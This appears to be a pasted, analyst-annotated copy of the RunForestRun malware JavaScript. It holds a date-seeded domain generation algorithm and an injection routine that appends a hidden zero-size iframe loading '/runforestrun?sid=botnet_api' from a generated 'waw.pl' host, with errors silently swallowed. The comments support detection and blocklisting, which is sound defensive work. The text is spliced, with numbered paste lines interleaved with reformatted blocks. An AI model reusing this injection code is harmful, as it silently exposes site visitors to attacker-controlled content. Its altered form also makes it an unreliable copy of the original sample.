
Untitled

a guest Jul 26th, 2012 364 Never
  1. /* New domain name generating algorithm used by the "botnet_api"
  2.    version of the RunForestRun attack described here:
  3.    http://blog.UnmaskParasites.com/2012/07/26/runforestrun-now-encrypts-legitimate-js-files
  4.    ============================================================== */
  5.  
  6. //Congratulations! you have successfully extracted the gootkit payload
  7. //this means i must work hardly :(
  8.  
  9.  
  /**
   * Advance the generator stored on `this` by one step and return the new
   * state scaled by `oneOverM`.
   *
   * Analyst notes: the constants set by RandomNumberGenerator (A = 48271,
   * M = 2147483647) are those of the classic "minimal standard" Lehmer
   * generator, but Q is computed there with floating-point division and is
   * never floored. The quotient and remainder below are therefore fractional,
   * and the sequence differs from a textbook integer implementation. Any
   * reimplementation used to predict domains for blocklisting or sinkholing
   * has to reproduce this double-precision arithmetic exactly.
   *
   * @this {{seed: number, A: number, M: number, Q: number, R: number, oneOverM: number}}
   * @returns {number} the updated seed multiplied by `oneOverM`
   */
  function nextRandomNumber() {
    var quotient = this.seed / this.Q;
    var remainder = this.seed % this.Q;
    var candidate = this.A * remainder - this.R * quotient;

    // A non-positive candidate is wrapped back into range by adding M.
    this.seed = candidate > 0 ? candidate : candidate + this.M;

    return this.seed * this.oneOverM;
  }
  21.  
  /**
   * Constructor for the seeded generator that drives the predictable part of
   * the domain name.
   *
   * Analyst notes (all read directly from the seed expression below):
   *  - The seed depends only on the month (0-based), the day of the month and
   *    a coarse hour bucket, Math.ceil(hours / 6), which takes the values 0..4.
   *    Minutes, seconds and the year do not take part.
   *  - getHours/getMonth/getDate return LOCAL time of the machine running the
   *    script, so the same instant can map to different seeds in different
   *    time zones. Domain-prediction tooling should enumerate buckets rather
   *    than assume UTC.
   *
   * @param {number} unix - timestamp in seconds
   * @returns {RandomNumberGenerator} `this`, with `next` bound to nextRandomNumber
   */
  function RandomNumberGenerator(unix) {
    var when = new Date(unix * 1000);
    var hourBucket = Math.ceil(when.getHours() / 6);

    var monthTerm = when.getMonth() * 0xFFFFFF;
    var dayTerm = when.getDate() * 0xFFFF;
    var bucketTerm = Math.round(hourBucket * 0xFFF);
    this.seed = 2345678901 + monthTerm + dayTerm + bucketTerm;

    // Generator parameters; Q is a floating-point quotient, not an integer.
    this.A = 48271;
    this.M = 2147483647;
    this.Q = this.M / this.A;
    this.R = this.M % this.A;
    this.oneOverM = 1.0 / this.M;

    this.next = nextRandomNumber;
    return this;
  }
  34.  
  /**
   * Map the next output of generator `r` onto the range Min..Max and round it
   * to the nearest integer.
   *
   * @param {{next: function(): number}} r - generator exposing `next()`
   * @param {number} Min - lower bound
   * @param {number} Max - upper bound
   * @returns {number} Math.round((Max - Min) * r.next() + Min)
   */
  function createRandomNumber(r, Min, Max) {
    var span = Max - Min;
    var scaled = span * r.next() + Min;
    return Math.round(scaled);
  }
  38.  
  /**
   * Build a host name of the form `<noise>.<seeded label>.<zone>`.
   *
   * Analyst notes:
   *  - The first label is 0..31 characters drawn with Math.random(), so it is
   *    NOT reproducible and can be empty (the result then begins with a dot).
   *    It should be ignored when matching; presumably the operators rely on
   *    wildcard DNS for it (inferred, not shown in this code).
   *  - The second label (`length` characters) comes from the date-seeded
   *    generator and is the part that can be precomputed for detection.
   *
   * @param {number} unix - timestamp in seconds used to seed the generator
   * @param {number} length - number of characters in the seeded label
   * @param {string} zone - suffix appended after the seeded label
   * @returns {string} the generated host name
   */
  function generatePseudoRandomString(unix, length, zone) {
    var prng = new RandomNumberGenerator(unix);
    var noiseLength = Math.floor(Math.random() * 32);
    var alphabet = "huozfexmrufmqhgnsvkehzrfrqoplpvbuaxoqeriqwkgfkdyenzossqlxfqayvpr".split('');
    var lastIndex = alphabet.length - 1;
    var host = '';
    var n;

    // Unseeded noise label.
    for (n = 0; n < noiseLength; n += 1) {
      host += alphabet[Math.floor(Math.random() * lastIndex)];
    }
    host += '.';

    // Date-seeded label: the predictable part of the name.
    for (n = 0; n < length; n += 1) {
      host += alphabet[createRandomNumber(prng, 0, lastIndex)];
    }

    return host + '.' + zone;
  }
  53.  
  // Injection stage, run 500 ms after the script loads.
  //
  // Indicators visible in this block, useful for detection and clean-up:
  //  - a zero-size, visibility:hidden IFRAME appended to document.body;
  //  - its src is "http://<generated host>/runforestrun?sid=botnet_api",
  //    with a 16-character seeded label under the 'waw.pl' zone;
  //  - two implicit globals are leaked onto the page: `iframeWasCreated`
  //    (run-once guard) and `ifrm` (the iframe element);
  //  - every error is swallowed by the empty catch, so a failure leaves no
  //    console output.
  setTimeout(function() {
    try {
      // Run-once guard: do nothing if a previous copy already injected.
      if (typeof iframeWasCreated != "undefined") {
        return;
      }
      iframeWasCreated = true;

      var now = Math.round(+new Date() / 1000);
      var host = generatePseudoRandomString(now, 16, 'waw.pl');

      ifrm = document.createElement("IFRAME");
      ifrm.setAttribute("src", "http://" + host + "/runforestrun?sid=botnet_api");
      ifrm.style.width = "0px";
      ifrm.style.height = "0px";
      ifrm.style.visibility = "hidden";
      document.body.appendChild(ifrm);
    } catch (e) {}
  }, 500);